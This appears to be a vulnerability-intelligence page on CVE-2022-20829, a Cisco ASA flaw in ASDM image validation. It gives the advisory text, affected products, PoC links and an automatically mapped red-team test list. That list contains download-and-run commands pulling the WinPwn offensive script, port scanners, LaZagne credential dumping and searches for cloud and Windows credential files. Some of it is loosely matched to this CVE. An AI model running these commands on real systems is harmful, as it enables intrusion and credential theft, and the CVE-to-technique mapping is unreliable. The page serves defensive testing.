CVE-2022-20829
Overview
This vulnerability is an authentication-based arbitrary code execution flaw resulting from insufficient validation of ASDM image authenticity during installation on Cisco ASA devices. The root cause lies in the inadequate verification mechanism for ASDM image signatures, allowing crafted images to bypass integrity checks. The affected component is the image validation process within Cisco Adaptive Security Appliance (ASA) Software when handling ASDM images.
Vulnerability Description
A vulnerability in the packaging of Cisco Adaptive Security Device Manager (ASDM) images and the validation of those images by Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker with administrative privileges to upload an ASDM image that contains malicious code to a device that is running Cisco ASA Software. This vulnerability is due to insufficient validation of the authenticity of an ASDM image during its installation on a device that is running Cisco ASA Software. An attacker could exploit this vulnerability by installing a crafted ASDM image on the device that is running Cisco ASA Software and then waiting for a targeted user to access that device using ASDM. A successful exploit could allow the attacker to execute arbitrary code on the machine of the targeted user with the privileges of that user on that machine. Notes: To successfully exploit this vulnerability, the attacker must have administrative privileges on the device that is running Cisco ASA Software. Potential targets are limited to users who manage the same device that is running Cisco ASA Software using ASDM. Cisco has released and will release software updates that address this vulnerability.
Impact
An authenticated remote attacker with administrative privileges on an ASA device can install a malicious ASDM image, enabling execution of arbitrary code on the targeted user's machine upon ASDM access. This allows compromise of the user's system with their privileges, potentially leading to credential theft, lateral movement, or further system compromise. Exploitation requires high privileges (PR:H) and network access (AV:N) but no user interaction beyond ASDM usage, as indicated by the CVSS vector.
Solution
Cisco has released software updates addressing this vulnerability in affected ASA firmware and ASDM versions, detailed in Cisco Security Advisory cisco-sa-asa-asdm-sig-NPKvwDjm. Administrators should apply the latest patches for Cisco Adaptive Security Appliance Software and Adaptive Security Device Manager as specified in the advisory. No workarounds are documented; prompt application of vendor-provided updates is recommended.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the packaging and validation of images within Cisco Adaptive Security Device Manager (ASDM) presents a significant risk to devices running Cisco Adaptive Security Appliance (ASA) Software. This flaw arises from inadequate validation of the authenticity of ASDM images during their installation. Specifically, an authenticated remote attacker with administrative privileges can upload a malicious ASDM image to the device. The lack of stringent checks allows the attacker to exploit this weakness, potentially leading to the execution of arbitrary code on the user's machine when they access the compromised device via ASDM. This vulnerability underscores the critical importance of robust image validation mechanisms in network security devices.
Exploitation of this vulnerability requires the attacker to first gain administrative access to the affected device. Once this access is obtained, the attacker can upload a crafted ASDM image that contains malicious code. The attack vector is particularly insidious, as it relies on the targeted user subsequently accessing the device using ASDM. Upon doing so, the malicious code can execute with the same privileges as the user, which may lead to unauthorized access to sensitive information, manipulation of device configurations, or even lateral movement within the network. This scenario highlights the potential for a single compromised device to serve as a foothold for broader attacks within an organization.
The real-world impact of this vulnerability can be profound, especially for organizations that rely heavily on Cisco ASA devices for their network security. The business risks associated with a successful exploit include data breaches, loss of intellectual property, and damage to brand reputation. Additionally, the financial implications can be severe, ranging from remediation costs to potential regulatory fines if sensitive data is exposed. Organizations may also face operational disruptions as they respond to the breach and work to secure their systems. The limited scope of potential targets—restricted to users managing the same device—does not diminish the severity of the threat, as successful exploitation can have cascading effects across the entire network.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular audits of device configurations and access logs can help identify unauthorized administrative access attempts. Additionally, organizations should ensure that they are running the latest software versions released by Cisco, as these updates address the identified vulnerabilities. Employing network segmentation can also limit the potential impact of an exploit by isolating critical systems from less secure environments. Furthermore, educating users about the risks associated with accessing devices through ASDM and encouraging the use of strong authentication methods can bolster defenses against exploitation.
In conclusion, the vulnerability in the ASDM image validation process poses a serious threat to the integrity and security of devices running Cisco ASA Software. The potential for exploitation highlights the need for rigorous validation processes and proactive security measures. Organizations must remain vigilant, continuously monitor their systems, and apply necessary updates to mitigate the risks associated with this vulnerability. By adopting a comprehensive security posture, businesses can better protect themselves against the evolving landscape of cyber threats.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Isa 3000 Firmware | All |
cpe:2.3:o:cisco:isa_3000_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Asa 5585-X Firmware | All |
cpe:2.3:o:cisco:asa_5585-x_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Asa 5512-X Firmware | All |
cpe:2.3:o:cisco:asa_5512-x_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Asa 5515-X Firmware | All |
cpe:2.3:o:cisco:asa_5515-x_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Device Manager | All |
cpe:2.3:a:cisco:adaptive_security_device_manager:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
jbaines-r7/theway
A tool for extracting, modifying, and crafting ASDM binary packages (CVE-2022-20829)
|
jbaines-r7 | 13 | 4 | 2022-04-28 | View |
|
PoC
|
- | 0 | 0 | - | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-20829 |
| tools.cisco.com |
GitHub CVE
vendor-advisory
x_refsource_CISCO
|
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-asdm-sig-NPKvwDjm |
| rapid7.com |
GitHub CVE
x_refsource_MISC
|
https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/ |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/jbaines-r7/theway |